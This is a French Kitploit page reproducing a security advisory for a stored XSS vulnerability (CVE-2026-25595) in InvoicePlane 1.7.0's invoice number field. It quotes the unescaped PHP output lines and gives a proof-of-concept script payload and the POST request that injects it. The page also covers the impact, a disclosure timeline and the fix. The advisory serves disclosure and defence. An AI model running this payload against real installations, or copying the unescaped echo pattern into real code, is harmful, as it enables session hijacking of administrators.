Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25595 — # Vulnérabilité XSS stockée dans InvoicePlane 1.7.0 via le champ non assaini du numéro de facture, avec preuve de concept et détails de remédiation. | Kitploit
Outils/GitHubGitHub/lagathos/cve-2026-25595
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebArticles et RechercheApprentissage et Éducation
GitHublagathos/cve-2026-25595

CVE-2026-25595

# Vulnérabilité XSS stockée dans InvoicePlane 1.7.0 via le champ non assaini du numéro de facture, avec preuve de concept et détails de remédiation.

Voir le dépôt
4il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-25595 — XSS stocké via le numéro de facture dans InvoicePlane 1.7.0

Vulnérabilité : Cross-Site Scripting (XSS) stocké via le champ Numéro de facture

Produit : InvoicePlane

Version affectée : 1.7.0 (et probablement les versions antérieures)

Gravité : Moyenne

Score CVSS 3.1 : 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE : CWE-79 : Neutralisation incorrecte des entrées lors de la génération de pages Web

Découvert par : Leonidas Agathos

Date du rapport : 2026-01-31


Description

Le champ invoice_number du formulaire de facture accepte des entrées arbitraires sans assainissement. La valeur est stockée et rendue non encodée à plusieurs endroits : le titre de la page de visualisation de la facture, le champ de saisie du numéro de facture et le widget des factures récentes du tableau de bord. La charge utile s'exécute dès qu'un administrateur consulte la facture affectée ou visite le tableau de bord.

Fichiers vulnérables :

  • application/modules/invoices/views/view.php:247
  • application/modules/invoices/views/view.php:494
  • application/modules/dashboard/views/index.php:233
  • root@kitploit:~
    // view.php - Ligne 247
    <?php echo trans('invoice') . ' ' . ($invoice->invoice_number ? '#' .
    $invoice->invoice_number : trans('id') . ': ' . $invoice->invoice_id); ?>
    
    // view.php - Ligne 494
    value="<?php echo $invoice->invoice_number; ?>"
    
    // dashboard/index.php - Ligne 233
    <?php echo anchor('invoices/view/' . $invoice->invoice_id, ($invoice->invoice_number
        ? $invoice->invoice_number : $invoice->invoice_id)); ?>
    

    Preuve de concept

    Étape 1 — Injecter la charge utile dans le numéro de facture

    Créez ou modifiez une facture à /index.php/invoices/form/{id} et définissez le numéro de facture sur :

    root@kitploit:~
    <script>alert("XSS in Invoices")</script>
    

    Requête :

    root@kitploit:~
    POST /index.php/invoices/ajax/save HTTP/1.1
    Host: 172.25.0.12
    Content-Type: application/x-www-form-urlencoded
    
    invoice_number=<script>alert("XSS+in+Invoices")</script>&invoice_id=22&...
    

    Étape 1 - Injection de la charge utile XSS dans le champ Numéro de facture via Burp Suite

    Étape 2 — Déclencher le XSS

    Naviguez vers /index.php/invoices/view/{id} ou /index.php/dashboard. La charge utile s'exécute au chargement de la page.

    Étape 2 - Exécution du XSS lors de la consultation du statut de la facture


    Impact

    La charge utile s'exécute dans le navigateur de tout administrateur qui consulte la facture affectée ou visite le tableau de bord. Cela permet le détournement de session (si les cookies ne sont pas HttpOnly), le vol de jetons CSRF et des actions effectuées sous l'identité de la victime.


    Chronologie

    DateÉvénement
    2026-01-30Vulnérabilité découverte
    2026-01-31Preuve de concept développée
    2026-01-31Fournisseur notifié
    2026-02-04Accusé de réception du fournisseur
    2026-02-04Correctif publié
    2026-02-05Divulgation publique

    Références

    • CWE-79
    • OWASP : Cross-Site Scripting (XSS)
    • CVE-2026-25595

    Avertissement

    Cette vulnérabilité a été découverte lors d'une recherche en sécurité indépendante. Toutes les informations sont fournies strictement à des fins éducatives, de recherche et de défense afin d'aider le fournisseur et la communauté de la sécurité à comprendre et à corriger le problème. Toute utilisation malveillante de ces informations est strictement interdite.

    Télécharger l’outil